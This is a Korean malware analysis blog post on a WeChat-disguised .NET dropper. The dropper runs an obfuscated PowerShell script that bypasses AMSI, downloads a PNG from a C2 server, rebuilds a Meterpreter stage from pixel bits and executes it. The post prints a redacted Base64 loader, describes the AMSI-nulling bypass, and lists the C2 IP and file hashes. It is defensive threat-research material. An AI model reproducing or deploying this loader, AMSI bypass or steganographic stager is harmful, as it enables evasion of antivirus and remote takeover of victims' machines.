위쳇(Wechat)으로 위장한 스테가노그래피(Steganography)를 악용한 악성코드-Meterpreter 백도어(2024.5.29)

오늘은 스테가노그래피(Steganography)를 악용한 악성코드-Meterpreter 백도어(2024.5.29)에 대해 알아보겠습니다.
해당 악성코드는 Wechat(위쳇)으로 아이콘으로 위장하는 것이 특징입니다.
해당 악성코드는 PowerShell 스크립트를 포함하고 있으며 Base64를 main 함수에 포함하고 UTF8로 변환하여 실행하는. NET 애플리케이션인 것을 확인할 수가 있습니다.

악성코드에 포함된 PowerShell 악성코드

dnSpy 본 악성코드에 포함된 Base64 코드

stri(n)g @(s)tring = Encoding.UTF8(.)GetString(Convert.Fro(m)Base64String("U0VU(I)CAoInswfX
sxfSItZicycUYnLCd4QScpICAoIF(t)0eVBlXSgiezV9ezN9ezZ9ezJ9ezd9ezl9ezR9ezExfXsxfXs(w)fXs4fXsxM
H0iIC1mJ21BUnMnLCcuJywnTnRJ(T)WUuSW5UZXInLCdTJywnaUMnLCdzWScsJ1RFTS5yVScsJ29QU0VSJywnaEEn
LCdWJywnTCcsJ0VTJykgKSAgOyRD(V)ksgPSBbVFlQZV0oInswfXsxfSIgLUYnUicsJ2VGJykgIDske0Zgd2l9PSAoI
GdF
dC1WQXJJQUJMR??????xf(S)ItZicyJywncW????????OTHkgICk6OigiezF9ezN9ezB9ezJ9Ii1mI
CdI
R2xvJywnQWxsbycsJ2Jhb(C)csJ2MnKS5JbnZva2UoKD(k)wNzYrO???MDkyKSk7JEN2ay4iYXNTYGVNYEJMeSIuIk
dlVHR5YFBlIigiU3lzd(G)VtLk1hbmFnZW1lbnQu(Q)(X)V0b21hdGlvbi??????2NSkrW2NIYVJdKFtieVR
lXT
B4NmQpK1tDaGFSXShbQ(n)lUZV0weDczKStbQ0hhUl0oW0JZdGVdM(H)g2OSkrW0NIYVJdKDg1KjMxLzMxKStbY0
hBUl0o
W2J5dGVdMHg3NCkrW(2)NIQVJdKDEwNSkrW2NIYXJdKDEwOCk(r)W0NoYXJdKDExNSszOS0zOSkpIikuImdFYFRg
Rkll
TEQiKCIkKCfDoG1zw(6)xTZXNzw67DtW4nLk5vUk1BTGla(S)hbY2hh??????TQpK1tjSGFSXSgxMTEp
K1tjSGFyXSgxMTQrMjQtM(j)QpK1tjaGFSXSgxMDYrMykrW(2)N??Y4KzI2LTI2KSkgLXJlcGxhY2UgW0NIQV
JdKDI0KzY4KStb???oW(0)J5dEVdMHg3MCkrW0NIY(X)JdKFtiWXRFXTB4N2IpK1tjSEFyXSg3Nys0NS00NSkrW2NoYVJd
KDYyKzQ4KStbQ0hBUl0???????xOC8xMT(g)pKSIsICgiezF9ezN9ezB9ezR9ez(J)9Ii1mJ2ljLCcsJ05vbic
sJ2ljJywnUHVibCcsJ1N0YXQnK?????7Mn17MX17MH0iLWYnbHVlJywnZXRWYScsJ1(M)nKS5JbnZva2UoJHtu
VWBMbH0sICR7bnVgbEx9KTsgJGN2ay4iYXNzZW1gQmBMeSIuImdgZXR0YFlQRSIoIlN5c3(R)lbS5NYW5hZ2VtZW
50LkF1dG9tYXRpb24uJChbY0??????????NjUpK1tjSGFSXShbYnlUZV0weDZkKStbQ2hhUl0oW0J(5)VGVdMHg3Mykr
0NIYVJdKFtCWXRlXTB4NjkpK1tDSGFSXS?????MS8zMSkrW2NIQVJdKFtieXRlXTB4NzQpK1t(j)SEFSXSgxMDU
pK1tjSGFyXSgxMDgpK1tDaGFyXSgx?????rMzktMzkpKSIpLiJnYEV0ZklgRUxkIigiJChbY2hhcl0(o)W2JZdEVdM
Hg2MSkrW0NoYVJdKFtCWXRlXTB4NmQpK??????FyXSg1NSs2MCkrW2NoQXJdKDEwNSs5Ny05NykrW0N(I)......
.OjoiYXNgQ2lpIi4iR2VgVHN0c???kciKCR7T31bMC4uMzU5OF0pKQ=="));
				if (!string.I?NullOrEmpty(text))
				{
					File.WriteAll?ext(text, @s?ring);
					return 0;

악성코드 분석

1.@string:PowerShell 스크립트
text: 파일 경로
@string (PowerShell) 내부에서 실행
2.PowerShell 페이로드 상세 분석
모든 변수, 함수, 타이명, 필드명이 문자열 조합("{0}{1}"-f 'a','b'`, `[char](65+...)), Base64 등으로 난독화
분석 시간 늘려주게 해서 탐지 회피 목적 어차피 탐지되지만….
2.AMSI 우회 (Antimalware Scan Interface Bypass)
AmsiUtils는 PowerShell의 악성코드 탐지 엔진(AMSI) 내부 클래스
amsiContext,amsiSession 등 필드를 null 또는 원하는 값으로 강제 조작
PowerShell이 실행하는 모든 스크립트는 AMSI 스캔 대상

121 그림 파일 다운로드

3.외부 PNG 파일 다운로드
sal a New-Object:a 명령어 별칭으로 생성자 역할
System(.)Drawing(.)Bitmap을 사용해 이미지 열기
다운로드 서버:121(.)37(.)221(.)98:11111
4.이미지 내 스테가노그래피 추출 및 실행
이미지 크기:1920x2 = 3840 픽셀 (좌표: x=0~~1919, y=0~~1)
각 픽셀의 B, G 채널의 하위비트, 상위비트를 조합해 바이트화
band15= AND 15 즉 하위 4비트 추출
B채널:상위 4비트 추출 후 16배 (왼쪽 시프트)
G채널:하위 4비트 추출

악성코드에 포함된 Base64 디코딩

둘을 OR해 1바이트 재구성 = 이미지에 숨겨진 2차 악성코드 복원
5. 복원된 바이트를 이용한 악성코드 추출 및 실행
바이트배열 \$o\[0..3598]->ASCII 문자열(스크립트, 코드, 쉘코드 등)
iex로 즉시 실행 (Invoke-Expression)
일단 악성코드 있는 부분은 모자이크 처리
다음 바이트 배열은 또 다른 Base64 문자열을 포함하는 2단계 PowerShell 스크립트로 변환되고, 이 문자열도 XOR 연산
XOR된 Base64 문자열을 디코딩하면 악성코드가 연결하는 데 사용하는 사용자 에이전트 문자열과 C2 IP 주소를 확인을 쉽게 할 수가 있으며 

XOR된 Base64 문자열 디코딩

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; WOW64; Trident/5.0) 그리고 121.37.221[.]98
파일명:wechat.exe
사이즈:1 MB
MD5:58a728da4e405ca979e73e774fe72fb9
SHA-1:33bfff315ba2bdef39002d8cc066b513cfe70aae
SHA-256:6f4571882606ee838590243876609effc6a78455fde3a908ed9f9220758c8eb9
이런 방식으로도 악성코드를 유포하고 있으니 조심하는 습관 그리고 이런 식으로 악성코드를 통한 개인정보 탈취를 예상할 수가 있지 않을까? 생각이 됩니다.